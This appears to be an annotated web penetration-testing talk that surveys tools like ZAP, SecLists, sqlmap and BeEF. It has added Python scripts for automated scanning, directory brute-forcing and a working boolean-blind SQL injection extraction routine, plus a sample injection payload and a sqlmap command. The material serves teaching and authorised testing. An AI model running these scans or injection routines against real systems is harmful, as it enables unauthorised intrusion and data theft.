![Page 1: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/1.jpg)
The Tools of A Web Application Penetration Tester
Chuck Ben-Tzur CISSP, CISM, CRISC, PMP
October 10, 2019
SecTor 2019
Introduction
• A little about me…
• Provide an overview of some free and available tools that can be used
during a web application penetration test.
• Will be using the following:
• Custom PHP web application (www.dardaleh.com)
• Kali Linux (tools are NOT part of the distribution!)
• NOT Metasploit…
Disclaimer
• The views and opinions expressed in this session are based on MY
experience and testing methodology when using these tools.
• If you disagree, it is likely because…
• You worked on different applications/environment/technology stacks
• You used different testing methodology (different goals, approach)
• You used the tools wrong
Web Application Testing (diagram; only its labels survived extraction): User/Client Side, Server/System Side, INPUT, OUTPUT
Penetration Test and OWASP Top 10
OWASP Top 10 (2017 edition)
• A1 - Injection
• A2 - Broken Authentication
• A3 - Sensitive Data Exposure
• A4 - XML External Entities (XXE)
• A5 - Broken Access Control
• A6 - Security Misconfiguration
• A7 - Cross-Site Scripting (XSS)
• A8 - Insecure Deserialization
• A9 - Using Components with Known Vulnerabilities
• A10 - Insufficient Logging & Monitoring
Penetration test phases:
Reconnaissance
Enumeration
Vulnerability Analysis
Exploitation
Reporting
Arachni
• A feature-full, modular, high-performance Ruby framework aimed
towards helping penetration testers and administrators evaluate the
security of modern web applications.
• It is free, with its source code public and available for review.
source: https://www.arachni-scanner.com
Demo #1 (Arachni)
Developer Tools
• Chrome DevTools is a set of web developer tools built directly into
the Google Chrome browser.
• DevTools can help you edit pages on-the-fly and diagnose problems
quickly, which ultimately helps you build better websites, faster.
source: https://developers.google.com/web/tools/chrome-devtools
Demo #2 (Dev Tools)
OWASP ZAP
• OWASP (Open Web Application Security Project) ZAP (Zed Attack
Proxy) is an open-source web application security scanner.
• When used as a proxy server it allows the user to inspect and
manipulate all of the traffic that passes through it, including traffic
using https (the browser must be configured to trust the root CA that
ZAP generates, or https sessions fail certificate validation).
source: https://en.wikipedia.org/wiki/OWASP_ZAP
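Beyond proxying, ZAP exposes everything it does through a JSON API on the same port, which is what makes it scriptable (and what the "integrate with Continuous Integration" point later in the deck relies on). The script below is an added example, not part of the slides or of the ZAP project: it drives a running ZAP through that API (spider, then active scan, then pull alerts) and collapses the per-instance alerts into findings ordered by risk, keeping the evidence strings so each one can be reproduced by hand before it goes into a report. The ZAP address, API key and target URL are assumptions; the alert list at the bottom is constructed in the shape ZAP's core/view/alerts view returns so the triage part runs offline.

```python
"""Drive a running OWASP ZAP through its JSON API and triage the alerts it raises.

Added example, not part of the slides or of the ZAP project. Assumptions: ZAP is
running locally with its API on 127.0.0.1:8080 (its default proxy/API port) and the
API key below; the target URL is a placeholder. Only the triage functions run in
the offline demo at the bottom, on a constructed alert list shaped like ZAP's
core/view/alerts output.
"""
import json
import time
import urllib.parse
import urllib.request
from collections import Counter

ZAP_API = "http://127.0.0.1:8080"  # assumption: default ZAP address
ZAP_API_KEY = "changeme"           # assumption: key shown under Tools > Options > API in ZAP
RISK_ORDER = {"High": 0, "Medium": 1, "Low": 2, "Informational": 3}


def zap_get(path, **params):
    """One ZAP API call, e.g. zap_get('spider/view/status/', scanId='0')."""
    params["apikey"] = ZAP_API_KEY
    url = f"{ZAP_API}/JSON/{path}?{urllib.parse.urlencode(params)}"
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.load(resp)


def spider_and_scan(target):
    """Crawl the target, then active-scan it, polling each until it reports 100%."""
    scan_id = zap_get("spider/action/scan/", url=target)["scan"]
    while int(zap_get("spider/view/status/", scanId=scan_id)["status"]) < 100:
        time.sleep(2)
    scan_id = zap_get("ascan/action/scan/", url=target)["scan"]
    while int(zap_get("ascan/view/status/", scanId=scan_id)["status"]) < 100:
        time.sleep(5)
    return zap_get("core/view/alerts/", baseurl=target)["alerts"]


def triage(alerts):
    """Collapse per-instance alerts into one finding per (name, url, param),
    High first, keeping every distinct evidence string so the tester can
    reproduce the request by hand before it is reported (the manual
    false-positive elimination the deck insists on)."""
    findings = {}
    for a in alerts:
        key = (a.get("alert") or a.get("name", "?"), a.get("url", ""), a.get("param", ""))
        f = findings.setdefault(key, {
            "name": key[0], "url": key[1], "param": key[2],
            "risk": a.get("risk", "Informational"),
            "confidence": a.get("confidence", ""),
            "cweid": a.get("cweid", ""),
            "evidence": set(),
        })
        if a.get("evidence"):
            f["evidence"].add(a["evidence"])
    ordered = sorted(findings.values(),
                     key=lambda f: (RISK_ORDER.get(f["risk"], 9), f["name"], f["url"]))
    for f in ordered:
        f["evidence"] = sorted(f["evidence"])
    return ordered


def risk_summary(findings):
    """Count of findings per risk level, e.g. {'High': 1, 'Low': 1}."""
    return dict(Counter(f["risk"] for f in findings))


# Constructed sample in the shape ZAP returns; not real scan output.
SAMPLE_ALERTS = [
    {"alert": "SQL Injection", "risk": "High", "confidence": "Medium",
     "url": "http://target.example/item.php?id=1", "param": "id",
     "evidence": "You have an error in your SQL syntax", "cweid": "89"},
    {"alert": "SQL Injection", "risk": "High", "confidence": "Medium",
     "url": "http://target.example/item.php?id=1", "param": "id",
     "evidence": "' OR '1'='1", "cweid": "89"},
    {"alert": "X-Content-Type-Options Header Missing", "risk": "Low",
     "confidence": "Medium", "url": "http://target.example/",
     "param": "x-content-type-options", "evidence": "", "cweid": "16"},
]

if __name__ == "__main__":
    import sys
    # With a URL argument this talks to ZAP; without one it triages the sample.
    alerts = spider_and_scan(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ALERTS
    findings = triage(alerts)
    for f in findings:
        print(f"[{f['risk']}] {f['name']} {f['url']} param={f['param']!r}")
        for ev in f["evidence"]:
            print("    evidence:", ev)
    print(risk_summary(findings))
```

Active scanning sends attack payloads, so point this only at the application you are authorised to test; the spider and scan are scoped by the URL you pass, but anything already proxied through ZAP is also in its alert store.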
Demo #3 (ZAP Proxy)
SecLists
• SecLists is a collection of multiple types of lists used during security
assessments, collected in one place. List types include usernames,
passwords, URLs, sensitive data patterns, fuzzing payloads, web
shells, and many more.
source: https://github.com/danielmiessler/SecLists
SecLists (cont.)
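A SecLists wordlist is only as useful as the tool consuming it; the classic use is web content discovery, and the classic false-positive source is an application that answers 200 with a "not found" page for anything it does not know (a soft 404), which turns every word into a hit. The script below is an added example, not from the slides or the SecLists project: it normalises a wordlist, fingerprints how the site answers a path that cannot exist, and reports only entries that differ from that baseline. The wordlist path (Kali's seclists package) and target URL are assumptions; the sample wordlist and sample_fetch are constructed so the logic runs offline.

```python
"""Web content discovery from a SecLists wordlist, with soft-404 filtering.

Added example; not part of the slides or of the SecLists project. The wordlist path
is an assumption (Kali's seclists package); the target URL is a placeholder. The
sample wordlist and `sample_fetch` are constructed so the logic runs offline.
"""
import random
import string
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Assumption: location of the seclists package on Kali (apt install seclists).
WORDLIST = "/usr/share/seclists/Discovery/Web-Content/common.txt"


def load_wordlist(lines):
    """Normalise raw wordlist lines: drop blanks, comments, leading '/' and duplicates."""
    seen, words = set(), []
    for line in lines:
        word = line.strip().lstrip("/")
        if not word or word.startswith("#") or word in seen:
            continue
        seen.add(word)
        words.append(word)
    return words


def http_fetch(url):
    """GET url -> (status, body length); HTTP error statuses are answers too."""
    req = urllib.request.Request(url, headers={"User-Agent": "seclists-discovery"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read() or b"")


def baseline(fetch, base_url):
    """How the site answers a path that cannot exist. Applications that reply
    200 with a 'not found' page (soft 404) would otherwise turn every word into
    a hit, which is the usual source of false positives in this kind of scan."""
    junk = "".join(random.choices(string.ascii_lowercase, k=16))
    return fetch(urljoin(base_url, junk))


def is_hit(response, base, tolerance=0.05):
    """A path is interesting when it is neither a real 404 nor a soft-404 look-alike
    (same status as the baseline and a body within a few percent of its size)."""
    status, size = response
    base_status, base_size = base
    if status == 404:
        return False
    if status == base_status and abs(size - base_size) <= max(32, tolerance * base_size):
        return False
    return True


def discover(fetch, base_url, words):
    """Return [(word, status, size)] for every wordlist entry that looks real."""
    base = baseline(fetch, base_url)
    hits = []
    for word in words:
        response = fetch(urljoin(base_url, word))
        if is_hit(response, base):
            hits.append((word, response[0], response[1]))
    return hits


# Constructed offline stand-in: a site that answers 200 + ~1500 bytes for unknown paths.
SAMPLE_WORDLIST = ["# comment line", "/admin", "admin", "", "backup.zip",
                   "robots.txt", "missing", "gone"]
_KNOWN = {"admin": (301, 0), "backup.zip": (200, 80000),
          "robots.txt": (200, 120), "gone": (404, 0)}


def sample_fetch(url):
    """Fake responder for the demo: known paths, soft-404 for everything else."""
    path = url.rsplit("/", 1)[-1]
    return _KNOWN.get(path, (200, 1500 + len(path) % 7))


def demo():
    return discover(sample_fetch, "http://target.example/", load_wordlist(SAMPLE_WORDLIST))


if __name__ == "__main__":
    if len(sys.argv) > 1:  # real run: python discover.py http://target.example/
        with open(WORDLIST, encoding="utf-8", errors="ignore") as fh:
            words = load_wordlist(fh)
        hits = discover(http_fetch, sys.argv[1], words)
    else:
        hits = demo()
    for word, status, size in hits:
        print(f"{status} {size:>8} /{word}")
```

Pass the base URL with a trailing slash (urljoin drops the last path segment otherwise), and treat the size tolerance as a starting point: sites that embed the requested path in their error page need a wider window or a comparison on body content rather than length.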
SQLmap
• A penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws, driven from the terminal.
• In addition to mapping and detecting vulnerabilities, the software
enables access to the database: enumerating it, viewing data in tables,
and editing or deleting data.
source: https://en.wikipedia.org/wiki/Sqlmap
• Caches what it learns about each target (injection points, DBMS
fingerprint, dumped data) in a local output directory (see --output-dir),
so a repeated run resumes rather than re-tests; --flush-session discards
that cache for a target.
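What sqlmap automates is worth seeing once by hand, both to understand its findings and to confirm them during the manual follow-up. The block below is an added example, not from the slides and not sqlmap's own code: a constructed in-memory SQLite "application" with one page that splices the request parameter into the SQL text and one that binds it as a parameter, plus a checker that only sees a fetch(value) -> page text function, as it would over HTTP. It runs sqlmap's first boolean-based test (compare the page with AND 1=1 and AND 1=2 appended) and then the blind extraction loop that reads a value one character at a time from nothing but that true/false difference.

```python
"""Boolean-based blind SQL injection: the detection and extraction technique sqlmap
automates, shown against a constructed in-memory SQLite application.

Added example (not part of the slides and not sqlmap's own code). `vulnerable_page`
mimics the string-concatenated query of a typical injectable PHP page; `safe_page`
is the same query with a bound parameter. The checker only sees a fetch(value) ->
page text function, exactly as it would over HTTP.
"""
import sqlite3
import string


def make_db():
    """Constructed sample database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)", [(1, "Hammer"), (2, "Saw")])
    return db


def vulnerable_page(db, product_id):
    """Injectable: the request parameter is spliced into the SQL text."""
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"Error: {exc}"
    return f"Product: {row[0]}" if row else "Product not found"


def safe_page(db, product_id):
    """Same lookup with a bound parameter: the input is only ever a value."""
    row = db.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()
    return f"Product: {row[0]}" if row else "Product not found"


def boolean_blind_check(fetch, base_value):
    """True when page content follows the truth of an injected condition.

    This is sqlmap's first boolean-based test: the original request is compared
    with 'AND 1=1' (should be identical) and 'AND 1=2' (should differ). A database
    error alone is a hint, not proof, and yields False here."""
    original = fetch(base_value)
    true_case = fetch(f"{base_value} AND 1=1")
    false_case = fetch(f"{base_value} AND 1=2")
    return true_case == original and false_case != original


def extract_blind(fetch, base_value, subquery, alphabet=string.ascii_letters, max_len=32):
    """Read the result of `subquery` one character at a time without ever seeing
    it in a response: only the true/false page difference leaks it. This is the
    slow path sqlmap falls back to when no query output is reflected."""
    original = fetch(base_value)
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"{base_value} AND substr(({subquery}),{pos},1)='{ch}'"
            if fetch(probe) == original:
                result += ch
                break
        else:
            break  # no character matched: end of the string
    return result


if __name__ == "__main__":
    db = make_db()
    for label, page in (("vulnerable", vulnerable_page), ("parameterised", safe_page)):
        fetch = lambda value, page=page: page(db, value)
        injectable = boolean_blind_check(fetch, "1")
        print(f"{label}: injectable={injectable}")
        if injectable:
            # Exploitation step: pull a value from another row without seeing it.
            print("  leaked:", extract_blind(fetch, "1", "SELECT name FROM products WHERE id=2"))
```

Against a real target the equivalent sqlmap invocation is the terminal command with the URL and parameter (for example sqlmap -u 'http://target/item.php?id=1' -p id --batch); the point of the hand-rolled version is that "the page changes when the condition changes" is the whole evidence, which is also why a parameterised query, where the input can never become a condition, does not trigger it.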
Demo #4 (SQLmap)
BeEF
• BeEF (Browser Exploitation Framework) is a penetration testing tool
that focuses on the web browser.
• A browser is "hooked" once it loads BeEF's JavaScript hook (delivered
through an XSS flaw or a page the tester controls); hooked browsers then
appear in the BeEF console and can be driven with its command modules.
source: https://beefproject.com/
Demo #5 (BeEF)
Things to Consider (Pros)
• Perfect for training and one-time projects
• If running multiple tools - allows for results comparison
• Usually very small footprint (or ability to run without install)
• Most tools provide APIs and can be easily integrated with Continuous
Integration activities – great security value.
• Usually extensible – allowing other users to add/enhance functionality
• You can contribute directly and affect the product direction/functionality
• Can’t beat the price!
Things to Consider (Cons)
• No official ownership and support
• Little quality assurance (bugs, vulnerabilities) and no guaranteed response time
• No guarantee of regular updates (or may be completely abandoned)
• A little harder to use (e.g. library dependencies, command lines,
somewhat limited platforms)
• Limited reporting capabilities (e.g. customized reports)
• Malicious users and hackers have access to these too…
Final Thoughts
• These are tools to complement the follow-up (and manual) work:
• Elimination of False Positive findings (there is no SQL injection if there is no Database!)
• Actual penetration test (following up on the “low hanging fruits”)
• Perform threat modeling, assigning risks and reporting
• There are MORE tools out there (e.g. w3af, Nikto)
• Most tools will do more than one thing (scanning, exploiting, built-in payloads)
• There are some good commercial tools out there (free versions, supported, User Interface)
• Special thanks to Erich Samuel for his input…